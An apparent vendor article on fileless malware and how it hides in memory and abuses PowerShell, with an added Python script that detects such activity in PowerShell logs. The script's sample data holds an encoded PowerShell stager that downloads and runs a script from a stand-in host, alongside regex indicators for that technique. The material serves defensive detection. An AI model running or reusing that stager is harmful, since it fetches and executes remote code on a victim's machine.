Fileless malware has become a significant threat, and what makes this kind of malware particularly nasty is how difficult it is to detect.
By Indi Siriniwasa, vice-president of Trend Micro SSA
These attacks are so stealthy and hard to find that the technique is increasingly popular among attackers. What’s more, these attacks are on the rise – because they get results.
The malware manages to dodge detection because its payload sits in places a scanner rarely looks, such as RAM or the kernel, and there is no file on the hard drive that has to run. When a malware scan is run on the computer, it finds nothing to flag, because the malware is not on the disk.
This works wonderfully for the hacker, as their point of entry is essentially invisible and they can go about their business – whether that’s stealing passwords or data, or corporate espionage – undetected. AV and machine learning AV would be on the lookout for executable files and would completely miss the malware, because it is never written to disk.
It could be said that this specific type of malware causes the system to effectively attack itself. The malware hides in parts of the computer that the regular user won’t think of checking or even know how to get to. Yes, it is possible to get rid of the malware, but many companies and organisations have not even begun to turn the spotlight on fileless malware.
Once the breach has taken place, it may take a while before anyone notices the damage caused. A fileless attack can make the browser run malicious code, or abuse the Microsoft PowerShell utility with specially designed scripts. Once the attacker is in, a command is executed and the hacker has access.
With fileless malware only now becoming mainstream, it could be a challenging prospect for any business or organisation to face. How do you protect your network from what is invisible?
Enabling a custom sandbox along with applying the principle of least privilege can help to prevent attacks. It is important to apply all the latest patches as well, not to mention adopting protocols for the use of PowerShell. Securing entry points and monitoring behaviour are also recommended.
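The "protocols for the use of PowerShell" and "monitoring behaviour" advice above is abstract; the following is an added example, not code from the article or from Trend Micro, of what behaviour monitoring can look like in practice once PowerShell script block logging is turned on. It reads a few constructed log lines (the format and hostnames are made up for this example), decodes any `-EncodedCommand` payload so that the real script text can be inspected, and raises an alert when a line carries two or more markers that are typical of scripts which fetch and run code in memory rather than from a file. The marker list and the alert threshold are assumptions to be tuned per environment, not a definitive signature set.

```python
"""Triage PowerShell script-block log lines for signs of in-memory (fileless) execution.

The log lines, hostnames and URL below are constructed for this example; they
imitate the text of Windows PowerShell Script Block Logging events (Event ID 4104).
"""
import base64
import re

# Assumption: these are common textual markers of scripts that download and run
# code without touching disk. They are heuristics, not a definitive signature set.
INDICATORS = {
    "encoded_command": re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "bypass_policy": re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
    "download_in_memory": re.compile(r"(?:DownloadString|DownloadData|Invoke-WebRequest|iwr)\b", re.I),
    "invoke_expression": re.compile(r"\b(?:Invoke-Expression|iex)\b", re.I),
    "reflective_load": re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load\b", re.I),
}

# Constructed sample: a one-line stager that pulls a script over HTTP and evaluates
# it in memory. It is encoded exactly the way PowerShell expects for -EncodedCommand
# (UTF-16LE, then base64) so that the decoder below has something realistic to parse.
STAGER_CMD = "IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/payload')"
ENCODED = base64.b64encode(STAGER_CMD.encode("utf-16-le")).decode("ascii")

SAMPLE_LOG = [
    # benign: an admin listing a folder
    "2024-05-01T10:02:11Z WS01 4104 Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object",
    # benign but carries one marker: a health check over HTTP (below the alert threshold)
    "2024-05-01T10:03:40Z WS01 4104 Invoke-WebRequest -Uri https://intranet.example/health -UseBasicParsing",
    # suspicious: hidden window, policy bypass and an encoded stager
    f"2024-05-01T10:05:02Z WS01 4104 powershell.exe -nop -w hidden -ep bypass -enc {ENCODED}",
]


def decode_encoded_command(text):
    """Return the decoded script if the line carries -EncodedCommand <base64>, else None."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", text, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_line(line):
    """Return (sorted indicator names, decoded payload or None) for one log line.

    Both the raw line and the decoded payload are inspected, so markers hidden
    behind base64 encoding are still counted.
    """
    hits = set()
    decoded = decode_encoded_command(line)
    for text in (line, decoded or ""):
        for name, pattern in INDICATORS.items():
            if pattern.search(text):
                hits.add(name)
    return sorted(hits), decoded


def triage(lines, threshold=2):
    """Return an alert record for each line with at least `threshold` indicators."""
    alerts = []
    for line in lines:
        hits, decoded = score_line(line)
        if len(hits) >= threshold:
            alerts.append({"line": line, "indicators": hits, "decoded": decoded})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_LOG):
        print("ALERT:", ", ".join(alert["indicators"]))
        print("  raw:    ", alert["line"][:80], "...")
        print("  decoded:", alert["decoded"])
```

Two design points matter here. First, decoding the payload before matching is what stops the obvious evasion of base64-encoding the whole command; a scanner that only looks at the raw line sees nothing but a blob. Second, the threshold exists because single markers are noisy: `Invoke-WebRequest` on its own is everyday administration, so the health-check line is scored but not alerted, while the stager trips five markers at once.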
It appears that fileless malware is the direction in which cyber attacks may be heading, and it is essential that the highest levels of vigilance and security be employed. Awareness that fileless malware exists is the very first step. It’s a particularly nasty and dangerous form of cyber attack, and keeping a keen eye on activity, behaviour and what’s happening on your system will help you to get ahead of an attack.